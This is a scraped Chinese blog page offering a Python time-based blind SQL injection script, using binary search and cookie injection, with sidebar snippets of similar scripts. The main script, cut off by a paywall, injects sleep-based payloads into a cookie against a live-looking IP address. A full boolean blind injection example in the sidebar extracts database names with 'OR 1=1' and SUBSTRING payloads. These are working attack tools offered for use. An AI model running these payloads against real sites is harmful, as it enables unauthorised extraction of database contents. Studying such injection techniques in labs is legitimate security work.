时间盲注python脚本(二分查找优化)支持cookie注入

最新推荐文章于 2024-05-07 09:48:38 发布
最新推荐文章于 2024-05-07 09:48:38 发布
阅读量947 收藏 3
点赞数
分类专栏: python web sql 文章标签: 盲注 python脚本 cookie注入 延时注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36915061/article/details/103355154
版权
这是一个针对时间盲注的Python脚本,采用二分查找法进行优化,同时支持Cookie注入。适用于字符型注入点,通过修改payload中的select语句来适应不同情况,如在末尾添加注释符或闭合单引号。提供get_length和get_name两个函数,可以根据猜测范围调整最小值和最大值。
摘要由CSDN通过智能技术生成

时间盲注python脚本(二分查找优化)支持cookie注入

菜鸟自用,仅供参考

使用说明

  • 可根据用途更改payload中的select语句,字符型注入点有两种注入情况:
    1、最后添加注释符
    2、最后的字符添加单引号,与原语句中的单引号闭合

  • get_length和get_name可结合使用

  • 可根据自己的猜解范围调整min和max

import requests
import datetime

#cookie中的时间盲注
def get_len_cookie():
    for i in range(0,30):
        url="http://119.6.122.74:2038/menu.php"
        cookies={
   
            'user':'admin'
        }
        #适用于字符型cookie注入
        #若条件符合,延迟3s
        #最后的‘%d是结合服务端的语句闭合,从而不使用注释结尾
        #cookies["user"] += "' and sleep(3) and (select length(@@secure_file_priv))='%d"%(i)
        #若不利用语句闭合,就要在结尾添加注释符
        cookies["user"] += "' and sleep(3) and (select length(@@secure_file_priv))=%d" % (i)+'%23'
        time1 = datetime.datetime.now()
        re = requests
最低0.47元/天 解锁文章
零”
关注
专栏目录
分别使用Java和Python实现二分查找算法
06-20
二分查找:分别使用Java和Python实现二分查找算法 二分查找:分别使用Java和Python实现二分查找算法 二分查找:分别使用Java和Python实现二分查找算法 二分查找:分别使用Java和Python实现二分查找算法 二分查找:...
时间盲注脚本(附带注释)
sGanYu
03-22 2813
参考python安全攻防时间盲注,自己修改了一些内容,加入了异常处理防止乱跑 # -*- coding: UTF-8 -*- import requests import time DBName = "" # 数据库名的变量 DBTables = [] DBColumns = [] DBData = {} requests.adapters.DEFAULT_RETRIES = 10 conn = requests.session() conn.keep_alive = False # 设置重连
python脚本实现sql时间盲注
wrypot的博客
03-27 806
python脚本实现sql盲注 sqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10关举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
时间盲注脚本——以sqli-labs第十关为例
weixin_52450702的博客
12-14 562
时间盲注脚本
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1654
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
Python脚本-时间盲注
m0_74317362的博客
09-23 1101
添加了time.sleep(0.05)
布尔盲注python脚本
04-22
.py文件,python脚本实现布尔盲注,输入网址实现自动化注入,信息包括数据库名、表名、字段以及字段中数据。 代码示例靶场:sqli_labs第八关实测可行 注意事项:python3.8,就用了一个requests第三方库,单线程实现...
Python搜索算法-二分查找算法详解
04-10
Python搜索算法——二分查找算法详解
python二分查找算法的递归实现方法
12-24
二分查找算法是一种在有序数组或列表中查找特定元素的搜索算法。它的基本思想是将查找范围不断减半,直到找到目标元素或者确定元素不存在。...了解并熟练掌握二分查找,对于提升编程技能和优化算法性能具有重要意义。
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
sql注入时间盲注脚本,mysql结构)
2401_82760239的博客
04-04 599
print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的长度")print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的内容")print("数据表", table, "第", index, "个字段的长度为", length)print("数据表", table, "第", index, "行数据的长度为", length)print ("目前已知数据库名", database)
超硬核,SQL注入时间盲注,原理+步骤+实战思路(1)
2401_84296945的博客
04-30 1098
时间盲注是指基于时间盲注,也叫延时注入,根据页面的响应时间来判断是否存在注入
sql注入时间盲注脚本(python)
npu2022303155的博客
03-31 277
之前看到一个布尔盲注脚本,感觉和时间盲注的逻辑差不多,只是判断条件变化了一下,基本没变化。所以就该了一下脚本。自己第一次做题,脚本跑出来了flag,但是错了中间的一个字符,猜测是时间延迟太小的原因。只是自己用sqlmap找出flag提交后,环境就关闭了,没验证过这个想法。但还是浅浅的记录一下吧。
时间盲注(ctfhub)
2401_82985722的博客
03-29 1416
(布尔盲注直接使用length进行筛选:按照length从高到低排序 前面四个即为结果,按照payload1的顺序进行排序得到数据库名sqli。(已经知道长度为4,可以直接设置为4,不知道时 设置比需要爆破字符的长度长。(5)点击开始攻击得到结果,sleep(5)要筛选出响应时间大于5s的数据包。condition为条件,条件为真时返回true,条件为假时返回false。再进行筛选,响应时间最大的四个就是执行成功的——sqli。# -D 指定库,-T指定表,-C 指定列(字段)(爆破字段为26个英文字母)
Python 安全开发 时间盲注脚本
YouthBelief的博客
10-26 1401
时间盲注0x00 时间盲注原理用到的函数有流程0x01脚本编写 (请求少,费时多)1.1用到的库1.2判断页面响应1.3判断返回字符串长度1.4 获取查询结果1.5 主函数0x02 脚本编写(请求多,费时少) 0x00 时间盲注原理 时间盲注应用于 页面 无论输入什么 页面显示 内容都一样, 可以用 ’ and sleep(5) --+ 发现 页面响应超过5秒 用到的函数有 sleep(5) 延时函数 延迟5秒 if($SQL,sleep(5),1) if函数 如果sql语句为真,执行sleep
python脚本时间盲注猜解
qq_36585338的博客
11-26 210
【代码】python脚本时间盲注猜解。
超硬核,SQL注入时间盲注,原理+步骤+实战思路
热门推荐
wangyuxiang946的博客
04-15 1万+
延时注入,什么是时间盲注时间盲注原理?时间盲注使用步骤?时间盲注使用场景?时间盲注Python脚本
2024年网络安全最全超硬核,SQL注入时间盲注,原理+步骤+实战思路(4),2024年最新字节跳动网络安全面试凉凉经
最新发布
2401_84239830的博客
05-07 879
数据库在执行SQL时,会先找缓存,如果缓存存在一样的SQL,则会直接返回缓存中的查询结果,而不会查找数据库。我们截取第一个字符,穷举这95种可能性即可,为了方便猜解,我们将字符转换为ASCLL码再进行判断(字符对应的ASCLL为 32~126)。同样的payload,如果第一次响应时间很长,但第二次响应时间很短,就说明是受到了网络波动的影响。条件表达式结果为 False 时,会执行第三个参数位置的代码,即 3,自定义的占位符,无实际意义,页面正常响应。如果你能答对70%,找一个安全工作,问题不大。
sql注入盲注python脚本
04-06
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的操作。而盲注是一种特殊类型的SQL注入攻击,攻击者无法直接获取数据库的具体信息,但可以通过不断尝试不同的条件来判断是否存在漏洞。 下面是一个使用Python编写的简单SQL注入盲注脚本的示例: ```python import requests def check_vulnerable(url): payload = "' OR 1=1 --" response = requests.get(url + "?id=" + payload) if "Welcome" in response.text: return True else: return False def exploit_blind(url): result = "" characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" while True: found = False for char in characters: payload = "' OR SUBSTRING((SELECT database()), 1, 1) = '" + char + "' --" response = requests.get(url + "?id=" + payload) if "Welcome" in response.text: result += char found = True break if not found: break return result # 示例使用方法 url = "http://example.com/vulnerable_page" if check_vulnerable(url): database_name = exploit_blind(url) print("数据库名称:", database_name) else: print("目标网站不易受SQL注入攻击") ``` 上述脚本中,`check_vulnerable`函数用于检测目标网站是否易受SQL注入攻击,它通过在URL中插入特定的payload来判断是否存在漏洞。`exploit_blind`函数用于利用盲注漏洞获取数据库名称,它通过不断尝试不同的字符来逐个获取数据库名称的每个字符。 请注意,上述脚本仅为示例,实际使用时需要根据具体情况进行修改和扩展,同时要遵循法律和道德规范,仅在合法授权的范围内使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值